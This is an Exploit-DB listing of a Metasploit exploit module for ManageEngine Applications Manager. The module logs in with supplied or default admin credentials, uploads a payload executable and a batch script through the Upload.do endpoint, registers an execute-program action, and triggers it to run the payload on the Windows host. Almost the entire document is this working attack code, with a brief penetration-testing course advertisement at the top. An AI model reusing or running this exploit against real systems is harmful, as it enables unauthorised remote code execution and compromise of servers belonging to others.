ManageEngine Applications Manager - (Authenticated) Code Execution (Metasploit)

EDB-ID:

17152

CVE:

N/A




Platform:

Windows

Date:

2011-04-08


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

##
# $Id: manageengine_apps_mngr.rb 12281 2011-04-08 14:06:10Z bannedit $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE

	def initialize
		super(
			'Name'        => 'ManageEngine Applications Manager Authenticated Code Execution',
			'Version'	=> '$Revision: 12281 $',
			'Description'	=> %q{
						This module logs into the Manage Engine Appplications Manager to upload a 
					payload to the file system and a batch script that executes the payload. },
			'Author'	=> 'Jacob Giannantonio <JGiannan[at]gmail.com>',
			'Platform'	=> 'win',
			'Targets'	=>
					[
						['Automatic',{}],
					],
			'DefaultTarget'	=>	0
			)
			
		register_options(
			[ Opt::RPORT(9090),
				OptString.new('URI', [false, "URI for Applications Manager", '/']),
				OptString.new('USER', [false, "username", 'admin']),
				OptString.new('PASS', [false, "password", 'admin']),
		], self.class)
	end
	def target_url
		"http://#{rhost}:#{rport}#{datastore['URI']}"
	end
	def exploit
		# Make initial request to get assigned a session token
		cookie = "pagerefresh=1; NfaupdateMsg=true; sortBy=sByName; testcookie=; "
		cookie << "am_username=;am_check="
		begin
			print_status "#{target_url} Applications Manager - Requesting Session Token"
			res = send_request_cgi({
				'method'=> 'GET',
				'uri'	=> "#{target_url}/webclient/common/jsp/home.jsp",
				'cookie'  => cookie.to_s
			}, 20)

			if !res
				print_error("Request to #{target_host} failed")
				return
			end

			if (res and res.code == 200 and res.to_s =~ /(JSESSIONID=[A-Z0-9]{32});/)
				cookie << "; #{$1}"
				print_good("Assigned #{$1}")
			else
				print_error("Initial request failed: http error #{res.code}")
				return
			end

		rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end

		# send cookie to index.do
		begin
			print_status "Sending session token to #{target_url}/index.do"
			res = send_request_raw({
				'method'  => 'GET',
				'uri'     => "#{target_url}/index.do",
				'cookie' => cookie
			}, 20)

			if !res || res.code != 200
				print_error("Request to #{target_url} failed")
			end

		rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout
			print_error("Request to #{target_url}/index.do failed")
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end

		# Log in with the assigned session token
		post_data = "clienttype2=html&j_username="
		post_data << "#{Rex::Text.uri_encode(datastore['USER'].to_s)}&"
		post_data << "j_password="
		post_data << "#{Rex::Text.uri_encode(datastore['PASS'].to_s)}&button=Login"
		print_status("Trying to log in with '#{datastore['USER']}':'#{datastore['PASS']}'")

		begin
			res = send_request_cgi({
				'method'  => 'POST',
				'uri'     => "#{target_url}/j_security_check",
				'cookie' => cookie,
				'data'    => post_data.to_s
			}, 20)

			if !res
				print_error("Request to #{target_url} Failed")
			end
			# Server responds with a 302 redirect when the login is successful and
			# HTTP 200 for a failed login
			if res and res.code == 302
				print_good("Success:'#{datastore['USER']}':'#{datastore['PASS']}'")
			else
				print_error("Failed to log into #{target_url}")
				return
			end

		rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout
			print_error("Request to #{target_url}/j_security_check failed")
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end
		# initial request to upload.do
		# I think this is required to upload content later on.
		begin
			res = send_request_cgi({
				'method'  => 'POST',
				'uri'     => "#{target_url}/Upload.do",
				'cookie'=> cookie,
				'data'    => post_data
			}, 20)

			if !res
				print_error("HTTP request to #{target_url} Failed")
			end

		rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout
			print_error("Request to #{target_url}/Upload.do Failed")
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end

		# Transfer the payload executable via POST request to Upload.do
		boundary = rand_text_numeric(11)
		payload_file = "#{rand_text_alphanumeric(20)}.exe"
		lines = "-----------------------------#{boundary}"
		content_disposition = "Content-Disposition: form-data; name=\"theFile\";"
		content_disposition << "filename=\"#{payload_file}\"\r\n"
		post_data = lines + "\r\n" + content_disposition.to_s
		post_data << "Content-Type: application/x-msdos-program\r\n\r\n"
		post_data << "#{generate_payload_exe}\r\n\r\n"
		post_data << lines + "\r\nContent-Disposition: form-data; "
		post_data << "name=\"uploadDir\"\r\n\r\n"
		post_data << ".\/\r\n#{lines}--\r\n"

		begin
			referer = "http://#{target_url}/Upload.do"
			res = send_request_raw({
				'method'  => 'POST',
				'uri'     => "#{target_url}/Upload.do",
				'headers' => {  'Referer' => referer,
					'cookie' => "#{cookie}\r\nContent-Type: " +
					"multipart/form-data; " +
					"boundary=---------------------------#{boundary}",
					'Content-Length' => post_data.length},
					'data'    => post_data
			}, 20)

			if !res
				print_error("Request to #{target_url} failed")
			end

			if res and res.code == 200
				print_good("Uploaded payload #{payload_file}")
			else
				print_error("Response HTTP #{res.code} and HTTP 302 expected")
			end

		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
			print_error("Request to #{target_url}/Upload.do failed")
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end
		# Transfer the batch sript via POST request to Upload.do
		# The server will eventually call the batch script, which will call the payload.exe
		boundary = rand_text_numeric(11)
		bat_file = "#{rand_text_alphanumeric(20)}.bat"
		lines = "-----------------------------#{boundary}"
		content_disposition = "Content-Disposition: form-data; name=\"theFile\"; "
		content_disposition << "filename=\"#{bat_file}\"\r\n"
		post_data = lines + "\r\n" + content_disposition.to_s
		post_data << "Content-Type: application/x-msdos-program\r\n\r\n"
		post_data << "@ECHO off && \"C:\\\\program files\\ManageEngine\\AppManager9\\workin"
		post_data << "g\\#{payload_file}\"\r\n\r\n"
		post_data << lines + "\r\nContent-Disposition: form-data; name=\"uploadDir\""
		post_data << "\r\n\r\n"
		post_data << ".\/\r\n#{lines}--\r\n"

		begin
			referer = "#{target_url}/Upload.do"
				res = send_request_cgi({
				'method'  => 'POST',
				'uri'     => "#{target_url}/Upload.do",
				'headers' => {  'Referer' => referer,
				'cookie' => "#{cookie}\r\nContent-Type: multipart/form-data; " +
				"boundary=---------------------------#{boundary}",
				'Content-Length' => post_data.length},
				'data'    => post_data
			}, 20)

			if !res
				print_error("HTTP request to #{target_url} failed")
				return
			end

			if res and res.code == 200
				print_good("Uploaded #{bat_file} to execute #{payload_file}")
			end

		rescue ::Rex::ConnectionRefused,::Rex::HostUnreachable,::Rex::ConnectionTimeout
			print_error("Request to #{target_url}/Upload.do failed")
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end

		action_name = "#{rand_text_alphanumeric(20)}"
		post_data = "actions=%2FshowTile.do%3FTileName%3D.ExecProg%26haid%3Dnull&ha"
		post_data << "id=null&method=createExecProgAction&redirectTo=null&id=0&disp"
		post_data << "layname=#{action_name}&serversite=local&choosehost=-2&host=&m"
		post_data << "onitoringmode=TELNET&username=&password=&description=&port=23"
		post_data << "&prompt=%24&command=#{bat_file}&execProgExecDir="
		post_data << "C%3A%5CProgram+Files%5CManageEngine%5CAppManager9%5Cworking&a"
		post_data << "bortafter=10&cancel=false"

		# This client request is necessary because it sends a request to the server
		# specifying that we are interested in executing the batch script.  If
		# successful, the server response body will contain an actionID that is
		# used to tell the server to execute the script.
		begin
			referer = "#{target_url}/showTile.do?TileName=.ExecProg&haid=null"
			res = send_request_cgi({
				'method'  => 'POST',
				'uri'     => "#{target_url}/adminAction.do",
				'headers' => {  'Referer' => referer,
				'cookie' => cookie,
				'Content-Type' => "application/x-www-form-urlencoded",
				'Content-Length' => post_data.to_s.length},
				'data'    => post_data.to_s
			}, 20)

			if !res
				print_error("Request to #{target_host} failed")
			end

			# We are parsing the response in order to determine the correct actionID.
			# My solution for doing this is to iterate through the HTTP response one
			# line at a time.  The correct actionID always comes up several lines 
			# after reading the name of the batch file 3 times.  Even if other batch 
			# files are mixed up in the list of actions to execute, ours is always 
			# the next one after reading the batch file name 3 times

			if res and (res.code == 302 || res.code == 200)
				action_id = 0
				x = 0
				res.body.each_line do |k|
					k.strip!
					if((k =~ /&actionID=(\d{8})/) && (x == 3))
						action_id = $1
						break;
					elsif((k =~ /#{bat_file}/) && (x < 3))
						x+=1
					end
				end
			else
				print_error("HTTP error #{res.code} and HTTP 302 expected")
			end

		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
			print_error("HTTP request to #{target_url}/adminAction.do ")
			return
		rescue ::Timeout::Error, ::Errno::EPIPE
			return
		end

		begin
			referer = "#{target_url}/common/executeScript.do?"
			referer << "method=testAction&actionID=#{action_id}&haid=null"
			print_good("Requesting to execute batch file with actionID #{action_id}")
			res = send_request_cgi({
				'method'  => 'GET',
				'uri'     => "#{target_url}/common/executeScript.do?method=testAction&" + 
						"actionID=#{action_id}&haid=null",
				'headers' => {  'Referer' => referer,
				'cookie' => 	"executeProgramActionTable_sortcol=1; " + 
						"executeProgramActionTable_sortdir=down; " + 
						"#{cookie}; executeProgramActionTable_" + 
						"sortdir=down; executeProgramActionTable_sortcol=1",
				'Content-Type' => "application/x-www-form-urlencoded"}
			}, 20)

		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
			print_error("Request to execute the actionID failed")
		rescue ::Timeout::Error, ::Errno::EPIPE
		end
	end
end